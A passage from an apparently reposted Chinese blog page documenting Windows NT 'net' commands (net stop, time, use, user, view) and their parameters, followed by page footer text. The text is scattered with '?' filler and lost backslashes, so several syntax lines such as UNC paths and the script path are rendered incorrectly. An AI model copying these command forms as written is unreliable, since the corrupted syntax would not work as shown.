顯示本地工作站服務的統計信息。 ? ? ? ? ? ? server ? ? ? ? ? ? 顯示本地服務器服務的統計信息。 ? ? ? ? ? ? Net Stop ? ? ? ? ? ? 停止 Windows NT 網絡服務。 ? ? ? ? ? ? net stop service ? ? ? ? ? ? 參數 ? ? ? ? ? ? service ? ? ? ? ? ? 包括下列服務： alerter（警報）、client service for netware（Netware 客戶端服務） ? ? ? ? ? ? 、clipbook server（剪貼簿服務器）、computer browser（計算機瀏覽器）、directory r ? ? ? ? ? ? eplicator（目錄復制器）、ftp publishing service (ftp )（ftp ? ? ? ? ? ? 發行服務）、lpdsvc、 ? ? ? ? ? ? messenger（信使）、net logon（網絡登錄）、network dde（網絡 dde）、network dde d ? ? ? ? ? ? sdm（網絡 dde dsdm）、network monitor agent（網絡監控代理）、nt lm security ? ? ? ? ? ? supp ? ? ? ? ? ? ort provider（NT LM 安全性支持提供）、ole（對象鏈接與嵌入）、remote access conne ? ? ? ? ? ? ction manager（遠程訪問連接管理器）、remote access isnsap service（遠程訪問 isns ? ? ? ? ? ? ap 服務）、remote access server（遠程訪問服務器）、remote procedure call ? ? ? ? ? ? (rpc) l ? ? ? ? ? ? ocator（遠程過程調用定位器）、remote procedure call (rpc) service（遠程過程調用服 ? ? ? ? ? ? 務）、schedule（調度）、server（服務器）、simple tcp/ip services（簡單 TCP/IP 服 ? ? ? ? ? ? 務）、snmp、spooler（后臺打印程序）、tcp/ip netbios helper（TCP/IP NETBIOS ? ? ? ? ? ? 輔助工 ? ? ? ? ? ? 具）、ups 及 workstation（工作站）。 ? ? ? ? ? ? 下列服務僅在 Windows NT Server 中可用： file server for ? ? ? ? ? ? macintosh、gateway servi ? ? ? ? ? ? ce for netware、microsoft dhcp server、print server for ? ? ? ? ? ? macintosh、remoteboot、w ? ? ? ? ? ? indows internet name service。 ? ? ? ? ? ? Net Time ? ? ? ? ? ? 使計算機的時鐘與另一臺計算機或域的時間同步。不帶 /set 參數使用時，將顯示另一臺計 ? ? ? ? ? ? 算機或域的時間。 ? ? ? ? ? ? net time [\computername │ /domain[:name]] [/set] ? ? ? ? ? ? 參數 ? ? ? ? ? ? \computername ? ? ? ? ? ? 要檢查或同步的服務器名。 ? ? ? ? ? ? /domain[:name] ? ? ? ? ? ? 指定要與其時間同步的域。 ? ? ? ? ? ? /set ? ? ? ? ? ? 使本計算機時鐘與指定計算機或域的時鐘同步。 ? ? ? ? ? ? Net Use ? ? ? ? ? ? 連接計算機或斷開計算機與共享資源的連接，或顯示計算機的連接信息。該命令也控制永久 ? ? ? ? ? ? 網絡連接。 ? ? ? ? ? ? net use [devicename │ *] [\computernamesharename[volume]] ? ? ? ? ? ? [password │ *]] [/user ? ? ? ? ? ? :[domainname]username] [[/delete] │ [/persistent:{yes │ no}]] ? ? ? ? ? ? net use devicename [/home[password │ *]] [/delete:{yes │ no}] ? ? ? ? ? ? net use [/persistent:{yes │ no}] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net use 將列出網絡連接。 ? ? ? ? ? ? devicename ? ? ? ? ? ? 指定要連接到的資源名稱或要斷開的設備名稱。有兩類設備名：磁盤驅動器（D: 到 Z:）和 ? ? ? ? ? ? 打印機（LPT1: 到 LPT3）。若鍵入星號而不是指定設備名將分配下一個可用設備名。 ? ? ? ? ? ? \computernamesharename ? ? ? ? ? ? 服務器及共享資源的名稱。如果計算機名包含空白字符，要用引號 (" ") 將雙反斜線及計算 ? ? ? ? ? ? 機名引住。計算機名長度可以是 1-15 個字符。 ? ? ? ? ? ? volume ? ? ? ? ? ? 指定服務器上的 NetWare 卷。要連接到 NetWare 服務器，必須安裝并運行 NetWare 客戶機 ? ? ? ? ? ? 服務 (Windows NT Workstation) 或 NetWare 網關服務 (Windows NT ? ? ? ? ? ? Server)。 ? ? ? ? ? ? password ? ? ? ? ? ? 訪問共享資源的密碼。 ? ? ? ? ? ? * ? ? ? ? ? ? 提示鍵入密碼。在密碼提示行中鍵入密碼時，將不顯示該密碼。 ? ? ? ? ? ? /user ? ? ? ? ? ? 指定進行連接的另外一個用戶。 ? ? ? ? ? ? domainname ? ? ? ? ? ? 指定另一個域。例如 net use d: \servershare /user:adminmariel 連接用戶 ? ? ? ? ? ? mariel，如 ? ? ? ? ? ? 同從 admin 域連接一樣。如果省略域，將使用當前登錄域。 ? ? ? ? ? ? username ? ? ? ? ? ? 指定登錄的用戶名。 ? ? ? ? ? ? /home ? ? ? ? ? ? 將用戶連接到其宿主目錄。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 取消指定網絡連接。如果用戶以星號指定連接，則取消所有網絡連接。 ? ? ? ? ? ? /persistent ? ? ? ? ? ? 控制永久網絡連接的使用。默認為上次使用的設置。無設備的連接不是永久的。 ? ? ? ? ? ? yes ? ? ? ? ? ? 保存建立的所有連接，并在下次登錄時還原。 ? ? ? ? ? ? no ? ? ? ? ? ? 不保存建立的連接和繼發連接，并在下次登錄時還原現有連接。使用 /delete 開關項取消永 ? ? ? ? ? ? 久連接。 ? ? ? ? ? ? Net User ? ? ? ? ? ? 添加或更改用戶帳號或顯示用戶帳號信息。 ? ? ? ? ? ? net user [username [password │ *] [options]] [/domain] ? ? ? ? ? ? net user username {password │ *} /add [options] [/domain] ? ? ? ? ? ? net user username [/delete] [/domain] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net user 將查看計算機上的用戶帳號列表。 ? ? ? ? ? ? username ? ? ? ? ? ? 添加、刪除、更改或查看用戶帳號名。用戶帳號名最多可以有 20 個字符。 ? ? ? ? ? ? password ? ? ? ? ? ? 為用戶帳號分配或更改密碼。密碼必須滿足在 net accounts 命令 /minpwlen 選項中設置的 ? ? ? ? ? ? 最小參數。最多是 14 個字符。 ? ? ? ? ? ? * ? ? ? ? ? ? 提示輸入密碼。在密碼提示行中鍵入密碼時，將不顯示該密碼。 ? ? ? ? ? ? /domain ? ? ? ? ? ? 在計算機主域的主域控制器中執行操作。 ? ? ? ? ? ? 該參數僅在 Windows NT Server 域成員的 Windows NT Workstation 計算機上可用。默認情 ? ? ? ? ? ? 況下，Windows NT Server 計算機在主域控制器中執行操作。 ? ? ? ? ? ? 注意：在計算機主域的主域控制器發生該動作。它可能不是登錄域。 ? ? ? ? ? ? /add ? ? ? ? ? ? 將用戶帳號添加到用戶帳號數據庫。 ? ? ? ? ? ? /delete ? ? ? ? ? ? 從用戶帳號數據庫中刪除用戶帳號。 ? ? ? ? ? ? 選項如下所示： ? ? ? ? ? ? /active:{no │ yes} ? ? ? ? ? ? 啟用或禁止用戶帳號。如果不激活用戶帳號，用戶就不能訪問計算機上的資源。默認值是 y ? ? ? ? ? ? es （激活）。 ? ? ? ? ? ? /comment:"text" ? ? ? ? ? ? 提供用戶帳號的注釋。該注釋最多可以有 48 個字符，文字用引號引住。 ? ? ? ? ? ? /countrycode:nnn ? ? ? ? ? ? 使用操作系統的國家代碼以便為用戶幫助和錯誤信息文件提供指定語言文件。0 值表示默認 ? ? ? ? ? ? 國家代碼。 ? ? ? ? ? ? /expires:{date │ never} ? ? ? ? ? ? 如果設置 date，將導致用戶帳號過期，never 不對用戶帳號設置時間限制。過期日期根據 ? ? ? ? ? ? /countrycode 值可以是下列格式： mm/dd/yy、dd/mm/yy 或 mmm, dd, yy。注意帳號在指定 ? ? ? ? ? ? 日期開始時過期。月份可以是數字、全名或三個字母的簡拼。年可以是兩位或四位數，使用 ? ? ? ? ? ? 逗號或斜線（不要用空格） 區分日期的各部分。如果省略 yy ，則使用該日期下一次到來的 ? ? ? ? ? ? 年份（根據計算機的時鐘）。例如如果在 1994 年 1 月 10 日到 1995 年 1 月 8 日之間輸 ? ? ? ? ? ? 入下列日期項，那它們相同：jan,9 ? ? ? ? ? ? 1/9/95 ? ? ? ? ? ? january,9,1995 ? ? ? ? ? ? 1/9 ? ? ? ? ? ? /fullname:"name" ? ? ? ? ? ? 指定用戶全名而不是用戶名。用引號將名字引住。 ? ? ? ? ? ? /homedir:path ? ? ? ? ? ? 設置用戶宿主目錄的路徑。該路徑必須存在。 ? ? ? ? ? ? /homedirreq:{yes │ no} ? ? ? ? ? ? 設置是否需要宿主目錄。 ? ? ? ? ? ? /passwordchg:{yes │ no} ? ? ? ? ? ? 指定用戶是否能改變自己的密碼。默認值是 yes。 ? ? ? ? ? ? /passwordreq:{yes │ no} ? ? ? ? ? ? 指定用戶帳號是否需要密碼，默認值是 yes。 ? ? ? ? ? ? /profilepath:[path] ? ? ? ? ? ? 設置用戶登錄配置文件的路徑。該路徑名指向注冊表配置文件。 ? ? ? ? ? ? /scriptpath:path ? ? ? ? ? ? 為用戶登錄腳本設置路徑。Path 不能是絕對路徑； ? ? ? ? ? ? path 是相對于 %systemroot%SYSTEM32REPLIMPORTSCRIPTS 的相對路徑：。 ? ? ? ? ? ? /times:{times │ all} ? ? ? ? ? ? 指定允許用戶使用計算機的時間。times 值表示為 day[-day][, day[-day]] , time[-time ? ? ? ? ? ? ][, time[-time]], 增量限制為一小時。Days 可以是全名或簡寫（M、T、W、Th、F、Sa、S ? ? ? ? ? ? u）。Hours 可以是 12 小時制或 24 小時制。對于 12 小時值，使用 AM、PM 或 A.M、P.M ? ? ? ? ? ? 。all 表示用戶總可以登錄。空值表示用戶永遠不能登錄。用逗號分隔日期和時間，分隔時 ? ? ? ? ? ? 間和日期的單位用分號（例如 M,4AM-5PM; T,1PM-3PM）。指定 /times 時不要使用空格。 ? ? ? ? ? ? /usercomment:"text " ? ? ? ? ? ? 讓管理員添加或更改帳號的“用戶注釋”。用引號引住文字。 ? ? ? ? ? ? /workstations:{computername[,...] │ *} ? ? ? ? ? ? 列出最多八個用戶可以登錄到網絡的工作站。用逗號分隔列表中的多個項。如果 /workstat ? ? ? ? ? ? ions 沒有列表，或如果列表是星號“*”，則用戶可以從任何一臺計算機登錄。 ? ? ? ? ? ? Net View ? ? ? ? ? ? 顯示域列表、計算機列表或指定計算機的共享資源列表。 ? ? ? ? ? ? net view [\computername │ /domain[:domainname]] ? ? ? ? ? ? net view /network:nw [\computername] ? ? ? ? ? ? 參數 ? ? ? ? ? ? 無 ? ? ? ? ? ? 鍵入不帶參數的 net view 將顯示當前域的計算機列表。 ? ? ? ? ? ? \computername ? ? ? ? ? ? 指定要查看其共享資源的計算機。 ? ? ? ? ? ? /domain[:domainname] ? ? ? ? ? ? 指定要查看其可用計算機的域。如果省略 domainname ，則顯示網絡的所有域。 ? ? ? ? ? ? /network:nw ? ? ? ? ? ? 顯示 NetWare 網絡中所有可用的服務器。如果指定計算機名，則顯示 NetWare 網絡中該計 ? ? ? ? ? ? 算機的可用資源。也可以用此開關指定添加到系統中的其他網絡。

閱讀(1338)| 評論(0)

? ? ? ?

?

?

?

?

?

推薦 轉載

?

常用網頁播放器代碼之wmp篇

?

如何用Ghost做系統系統安裝盤

評論

? 登錄后你可以發表評論，請先登錄。登錄>>

我的照片書 - 博客風格 - 手機博客 - 下載LOFTER APP -?訂閱此博客

網易公司版權所有??1997-2018

?

總結

以上是生活随笔為你收集整理的Windows命令的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。